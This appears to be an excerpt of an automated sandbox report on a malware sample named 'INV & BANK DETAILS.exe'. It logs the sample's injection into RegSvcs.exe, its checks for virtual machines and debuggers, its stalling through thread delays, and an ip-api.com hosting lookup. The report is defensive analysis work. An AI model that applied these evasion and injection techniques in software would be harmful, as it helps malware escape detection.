                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeAPI/Special instruction interceptor: Address: 3CD327C
                  Source: RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599338Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598134Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597574Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 878Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8981Jump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87686
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeAPI coverage: 3.8 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599338Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598134Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597574Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596371Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594624Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmware
                  Source: RegSvcs.exe, 00000002.00000002.3868694679.0000000005253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                  Source: INV & BANK DETAILS.exe, 00000000.00000002.1431474428.0000000000C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}HK
                  Source: RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-86788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_03CD3548 mov eax, dword ptr fs:[00000030h]0_2_03CD3548
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_03CD34E8 mov eax, dword ptr fs:[00000030h]0_2_03CD34E8
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_03CD1EB8 mov eax, dword ptr fs:[00000030h]0_2_03CD1EB8
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 79C008Jump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
